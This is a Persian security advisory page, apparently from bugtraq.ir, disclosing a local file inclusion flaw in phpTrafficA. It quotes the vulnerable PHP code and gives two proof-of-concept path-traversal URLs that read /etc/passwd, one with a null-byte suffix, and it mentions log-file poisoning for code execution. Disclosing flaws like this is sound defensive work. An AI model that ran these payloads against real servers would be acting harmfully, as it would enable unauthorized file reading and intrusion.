تماس با ما
درباره ما
مقالات
آرشیو
آخرین آسیب پذیری ها
آخرین اخبار
صفحه اصلی
 
 
 

 
 
 


نکته ویژه: شما مي توانيد در اين سايت آخرين آسيب پذيري هاي امنيتي به همراه آخرين مكمل هاي امنيتي را بيابيد
همچنين با عضويت در خبرنامه آخرين اخبار امنيتي را بصورت منظم دريافت كنيد
در صورتي که نياز به خدمات خاص و ويژه اي داريد با بخش پشتيباني ما تماس بگيريد .همچنين مي توانيد براي تماس تلفني از شماره 09354192995 استفاده نماييد.

آخرين آسيب پذيري ها  
آخرین اخبار امنيتي  
آخرین ويروس ها  

تبلیغات :
فروشگاه مجازی رایانه


1385-12-04 01:49:28
طبقه بندی :
امنیت در برنامه های سمت سرور (2)
آسیب پذیری های امنیتی (8)
آشنایی با آسیب پذیری پیوست فایل (خارجی و داخلی) (2)
شماره مقاله : 1
سطح علمی : 1
کیفیت مقاله : 4
عنوان :آسيب پذيري پيوست فايل داخلي در phpTrafficA

خلاصه مقاله
يك نرم افزار مونيتور وب سايت تحت مجوز GPL بر پايه php و mysql است .
از قابليت هاي اين نرم افزار مونيتور هم زمان چند وب سايت و تعيين مشخصات بازديد كنندگان (نوع مرورگر – كشور و... ) مي باشد .
متن اصلی


phpTrafficA-1.4.1 Local File Inclusion

phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.
It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more!

http://soft.zoneo.net/phpTrafficA/


Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

Vulnerable Systems:
Version: phpTrafficA-1.4.1
phpTrafficA-1.4beta4
(also tested on phpTrafficA-1.3)

Description:
Input passed to the "file" parameter in "plotStat.php" and "lang" parameter in "banref.php" is not properly verified, before it is used to include files.
This can be exploited to include/see arbitrary files from local resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);



//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
$lang = $_GET["lang"];
if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");


POC exploit :
The following URL will cause local file inclusion

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00

# http://www.bugtraq.ir


آسيب پذيري پيوست فايل داخلي در phpTrafficA

phpTrafficA يك نرم افزار مونيتور وب سايت تحت مجوز GPL بر پايه php و mysql است .
از قابليت هاي اين نرم افزار مونيتور هم زمان چند وب سايت و تعيين مشخصات بازديد كنندگان (نوع مرورگر – كشور و... ) مي باشد .

كه در آدرس زير قايل دسترسي مي باشد .
http://soft.zoneo.net/phpTrafficA

http://www.bugtraq.ir

نسخه هاي آسيب پذير :

phpTrafficA-1.4beta4
phpTrafficA-1.3

نسخه هاي قبلي نيز اختمالا به علت تشابه آسيب پذير هستند .

توضيحات :
ورودي پارامتر "file" در "plotStat.php" و همچنين "lang" در "banref.php" پيش از پيوست فايل بصورت مناسب از لحاظ امنيتي بررسي نمي شوند .
نفوذگر با توجه به اين آسيب پذيري قادر به اجرا ( و همچنين خواندن ) فايل هاي دلخواه (حاوي كد هاي php ) از منابع داخل سرور (فايل هاي درون سرور ) مي باشد . همچنين با تزريق كد هاي php به فايل هايي درون سرور (نظير فايل هاي ثبت رويداد ) كد هاي دلخواه خود را اجرا كند .
مي توانيد اطلاعات بيشتر در مورد پيوست فايل داخلي Local File inclusion را در http://www.bugtraq.ir بيابيد .

كد هاي آسيب پذير :


//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);



//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
$lang = $_GET["lang"];
if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");


كد مخرب براي اثبات ادعا :

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00

اين آسيب پذيري توسط حميد عبادي كشف شده و تمامي حقوق براي رسانه امنيت ديجيتال محفوظ مي باشد .

منبع : رسانه امنيت ديجيتال
http://www.bugtraq.ir

حميد عبادي
منابع و نویسندگان :
http://www.bugtraq.ir

 
صفحه اصلی  
آرشیو آسیب پذیری ها  
- بر اساس محصولات  
- بر اساس تولید کنندگان  
- بر اساس تاریخ  
مقالات امنيت شبكه  
راهنمای استفاده  
ارسال مقاله  
مهر 1385  
آبان 1385  
آذر 1385  
دي 1385  
بهمن 1385  
اسفند 1385  
فروردين 1386  
ارديبهشت 1386  
خرداد 1386  
تير 1386  
مرداد 1386  
شهريور 1386  
مهر 1386  
آبان 1386  
آذر 1386  
دي 1386  
بهمن 1386  
اسفند 1386  
فروردين 1387  
ارديبهشت 1387  
خرداد 1387  
تير 1387  
مرداد 1387  
شهريور 1387  
مهر 1387  
آبان 1387  
آذر 1387  
دي 1387  
بهمن 1387  
اسفند 1387  
فروردين 1388  
ارديبهشت 1388  
خرداد 1388  
تير 1388  
مرداد 1388  
شهريور 1388  
مهر 1388  
آبان 1388  
آذر 1388  
دي 1388  
بهمن 1388  
اسفند 1388  
درباره ما و اهداف ما  
تماس با ما  
پیشنهادات شما  
شرایط استفاده  
پشتیبانان و حامیان ما  
استفاده از خدمات رايگان  
 
 
 
www.BugTraq.ir صفحه اصلی  |  مقالات امنیتی  درباره ما  تماس با ما  شرایط استفاده  پیشنهادات شما